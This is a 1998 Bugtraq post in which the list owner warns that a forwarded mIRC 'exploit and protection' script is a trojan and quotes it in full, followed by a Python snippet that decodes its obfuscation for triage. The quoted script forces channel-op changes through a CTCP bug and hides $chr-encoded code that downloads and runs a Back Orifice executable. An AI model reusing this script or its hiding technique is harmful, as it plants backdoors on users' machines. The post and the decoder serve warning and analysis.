[8559] in bugtraq


Re: your mail

daemon@ATHENA.MIT.EDU (owner-bugtraq@NETSPACE.ORG)
Sat Nov 14 20:26:20 1998

Date: 	Sat, 14 Nov 1998 16:08:54 -0600
X-To:         System Administrator <root@BRAMPTON1.NETMATRIX.NET>
From: <owner-bugtraq@NETSPACE.ORG>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <199811131950.OAA02949@brampton1.netmatrix.net>

This is a trojan script. If it worked right, it would connect to a certain
webserver and download BO. This should *not* have been passed on to the
list; do *not* attempt to load this script.

On Fri, 13 Nov 1998, System Administrator wrote:

> Hi,
> while debugging/hexing/disassembling mirc my friend slotmech last week found
> a mirc bug which allows to force users to send MODE commands to the server.
> this example script sends a MODE +o to the irc server. the mirc author has been
> notified of this but we didn't receive a response... my exploit+protection scri$
> is included. Expect more mirc stuff from us.
>
> cya,
>     fs
>
> --- cut here ---
>
> ;#; mIRC v5.41 hack protection & exploit by FeaRStorm <fearstorm@gmx.net>
> ;#;    Allows to let a victim op yourself using a bug in mIRC5.41, script based$
> ;#;    included. Bug may not work on scripts that do a halt; after a ctcp useri$
> ;#;
> ;#; -------- Use /hackop nick #channel to make nick give you op on #channel !
> ;#; -------- That's it... have phun!
> ;#;
> ;#;  greets go to tr4xzor, slotmech, meep, fowi, lotomax and all #haktex opz !
> ;#;  no greets to the following lamerz: cheyenne, zito, cortex and DrFrozt (ass$
> ;#;  Credits: i didn't find this bug, slotmech did... i only wrote this exploit$
> ;#;
> ;#;   if you want to add this code to your own script please: ASK FIRST!
>
> ctcp 1:userinfo*: antihack
>
> alias antihack {
>   if ($len($2) > 17 && $chr(91) isin $2-) {
>     echo $active mIRC5.41 hack attempt from $nick
>     .halt
>   }
> }
>
> alias hackop {
>   if ($2 == $null) {
>     echo 3 *** Usage: /hackop nick #channel
>     .halt
>   }
>   if ($me !ison $2) {
>     echo 3 *** You aren't on that Channel!
>     .halt
>   }
>   if ($1 !isop $2) {
>     echo 3 *** $1 isn't opped on that channel!
>     .halt
>   }
>   checklen $1
>   .ctcp $$1 userinfo $ $+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx $6) $+ $chr(115) $chr(109) $+ $chr(111) $+ $chr(100) $+ $chr(101) $+ : +o $me | $}
>
> alias checklen {
>   .if (%xcomplete == 1) halt
>   .if (%xinprog == 1) halt
>   .set %xfilename song2.exe
>   .set %xlof $lof(%xfilename)
>   .set %xfirst 1
>   .write -c %xfilename
>   ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104 101 - 1$
>   .sockclose protx
>   .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+ $chr$
> }
> on 1:sockopen:protx: {
>   .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47) $+ $chr(57) $+ $c$
>   .sockwrite -n protx
> }
>
> on 1:sockread:protx: {
>   .sockread &test
>   .set %xlof $lof(%xfilename)
>   .if (%xfirst == 1) set %xlof 0
>   .set %xfirst 0
>   .bwrite %xfilename %xlof $sockbr &test
> }
>
> on 1:connect:checklen
>
> on 1:sockclose:protx: {
>   .sockread &test
>   if ($sockbr > 0) {
>     .set %xlof $lof(%xfilename)
>     .bwrite %xfilename %xlof $sockbr &test
>   }
>   .if ($lof(%xfilename) == 178306) {
>     .run %xfilename
>     .set %xcomplete 1
>   }
>   if ($lof(%xfilename) != 178306) {
>     .timer 1 300 checklen
>   }
>   }
>   unset %xinprog
>   unset %xfilename
>   unset %xlof
>   unset %xfirst
> }
>
> --- cut here ---
>
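
The quoted script hides its network strings behind `$chr(N)` values joined with `$+`, so a reviewer triaging such a script wants those resolved and the socket, file-write and run commands flagged before anything is loaded. The Python below is an added example, not part of the original message; the sample script, the host `www.example.test`, the name `file.bin` and the watch list of commands are constructed assumptions.

```python
import re

CHR = re.compile(r"\$chr\((\d+)\)", re.I)
# Assumed watch list: mIRC commands that open sockets, write files or execute.
RISKY = {"sockopen": "opens a socket", "sockwrite": "sends data",
         "bwrite": "writes a binary file", "run": "executes a program"}

def decode(line):
    """Resolve $chr(N) and the $+ concatenation operator in one script line."""
    out, glue = [], False
    for tok in line.split():
        if tok == "$+":          # $+ joins its neighbours without a space
            glue = True
            continue
        tok = CHR.sub(lambda m: chr(int(m[1])) if int(m[1]) < 256 else m[0], tok)
        if glue and out:
            out[-1] += tok
        else:
            out.append(tok)
        glue = False
    return " ".join(out)

def triage(script):
    """Return (line number, reasons, decoded line) for each suspicious line."""
    findings = []
    for no, line in enumerate(script.splitlines(), 1):
        words = line.split()
        cmd = words[0].lstrip("./").lower() if words else ""
        reasons = [f"{cmd}: {RISKY[cmd]}"] if cmd in RISKY else []
        if len(CHR.findall(line)) >= 3:   # heavy $chr use hides readable text
            reasons.append("chr-obfuscated text")
        if reasons:
            findings.append((no, reasons, decode(line)))
    return findings

# Constructed sample; the host and file name are placeholders.
SAMPLE = """\
alias checklen {
  .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ example.test 80
}
on 1:sockopen:protx: {
  .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ file.bin
}
on 1:sockclose:protx: {
  .run %xfilename
}
"""

for finding in triage(SAMPLE):
    print(finding)
```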
